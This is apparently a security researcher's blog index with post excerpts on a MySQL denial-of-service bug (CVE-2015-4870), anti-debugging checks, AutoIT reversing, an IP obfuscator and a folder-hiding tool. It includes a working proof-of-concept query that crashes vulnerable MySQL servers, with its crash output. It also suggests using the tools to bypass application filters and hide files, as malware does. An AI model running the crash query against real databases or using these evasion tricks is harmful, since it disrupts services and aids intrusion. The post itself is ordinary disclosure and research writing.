For this yearโs birthday the most awesome gift I received was from hasherazade ๐
I am very thankful to her for making my birthday so special ๐
This crackme is a bootloader written in 16-bit assembly. This is how this look like.
Latest Blog Posts
MySQL DoS in the Procedure Analyse Function – CVE-2015-4870
This is a crash I found in MySQL versions up to 5.5.45. In the function procedure analyse() I found this crash while passing a sub query.
Syntax:
[code language=”sql”]
SELECT * FROM `table_name` PROCEDURE ANALYSE((SELECT*FROM(SELECT 1)x),1);
[/code]
So an Example POC would be:
[code language=”sql”]
select * from information_schema.tables procedure analyse((select*from(select 1)x),1);
[/code]
[code language=”sql”]
—————————————————————————————————————
mysql> select * from information_schema.tables procedure analyse((select*from(select 1)x),1);
ERROR 2013 (HY000): Lost connection to MySQL server during query
mysql>
mysql> select 1;
ERROR 2006 (HY000): MySQL server has gone away
No connection. Trying to reconnect…
ERROR 2003 (HY000): Can’t connect to MySQL server on ‘localhost’ (10061)
ERROR:
Can’t connect to the server
mysql>
—————————————————————————————————————
[/code]
Share this:
Parent Process Detection
By checking the parent process of a given process we can determine if the process is being debugged or not by expecting โexplorer.exeโ to be the usual parent process started by the user.
For this technique the following Windows APIs are used.
We also use a pointer to PROCESSENTRY32 structure which will store the information of each process taken from the snapshot.
[code language=”C”]
typedef struct tagPROCESSENTRY32 {
DWORD dwSize;
DWORD cntUsage;
DWORD th32ProcessID;
ULONG_PTR th32DefaultHeapID;
DWORD th32ModuleID;
DWORD cntThreads;
DWORD th32ParentProcessID;
LONG pcPriClassBase;
DWORD dwFlags;
TCHAR szExeFile[MAX_PATH];
} PROCESSENTRY32, *PPROCESSENTRY32;
[/code]
Share this:
Dato Capital Hall of Fame
I got listed in the Dato Capitol Hall of Fame for reporting a XSRF issue in their website.
https://en.datocapital.com/report-security-issue.html
Share this:
IP Obfuscator
A simple tool to convert the IP to different obfuscated forms written in C by me ๐ I just wrote this for fun. You may use this when it comes bypassing application filters and much more ๐
Example:
IP address of http://google.lk : http://222.165.163.91
Other forms you can write the same IP:
[+] http://3735397211
(more…)
Share this:
Debugger Detection Using NtGlobalFlag
This is another simple anti-reversing trick used to detect a debugger. As I have shown earlier in my post about the TEB structure and the PEB structure, NtGlobalFlag is located in the PEB Structure at offset PEB+104.
When the process is being debugged the NtGlobalFlag is set to 0x70.
Share this:
IsDebuggerPresent API
I was interested in learning about the anti-reversing techniques in the world of reverse engineering. There are so many techniques out there and I thought of trying few techniques and understanding them from the lowest level. I thought of sharing the things Iโve been experimenting these days.
IsDebuggerPresent is a Windows API that can be used to detect a debugger. Hereโs an example code:
[code language=”C”]
/*
* IsDebuggerPresent Example
* Author: Osanda Malith Jayathissa (@OsandaMalith)
* Website: http://osandamalith.wordpress.com
*/
#include <windows.h>
int main() {
MessageBox(0, IsDebuggerPresent() ? "Debugger found" : "Debugger not found","Status",0x30);
}
[/code]
If we open in a debugger โDebugger Foundโ text will get triggered in the MessageBox API. How this API works? Open the API in the debugger and you get the following piece of code.
[code language=”C”]
MOV EAX,DWORD PTR FS:[18]
MOV EAX,DWORD PTR DS:[EAX+30]
MOVZX EAX,BYTE PTR DS:[EAX+2]
[/code]
(more…)
Share this:
Reversing AutoIT Applications
When we try to open a compiled AutoIT application in a debugger we get this error message.
Letโs try to find the return address from the MessageBoxA API from the stack.
(more…)
Share this:
Magic Folder Hide
This is a application which I coded in last year but I have forgotten to make a blog post. Using this tool you can create a ‘..’ folder in Windows and store your data inside it. No one can access your files using the explorer since the path is not valid, they can only see the name ๐
This trick can be used in pentesting and is widely used by malware for hiding other malicious files. I coded this tool just for fun ๐
Share this:
My Journey into eWPT
Last year I thought of getting certified in the field of web application security since I haven’t done any certifications before. I researched about the current certifications in the market and found out most of them are just answering few MCQs and getting certified, but unfortunately those are highly accepted by different organizations. But when it comes to the info sec industry there’s a bunch of good certifications I had in mind to complete someday. So considering my budget, time and resources I thought of taking eLearnSecurity’s eWPT certification. This certification is highly hands-on and a fully practical penetration test based exam. When it comes to the industry it’s hard to prove we know something, so I think I did a better choice in taking a certification in the field which I have experience since small age. Apart from that before I loose my teens I wanted to get certified ๐
(more…)
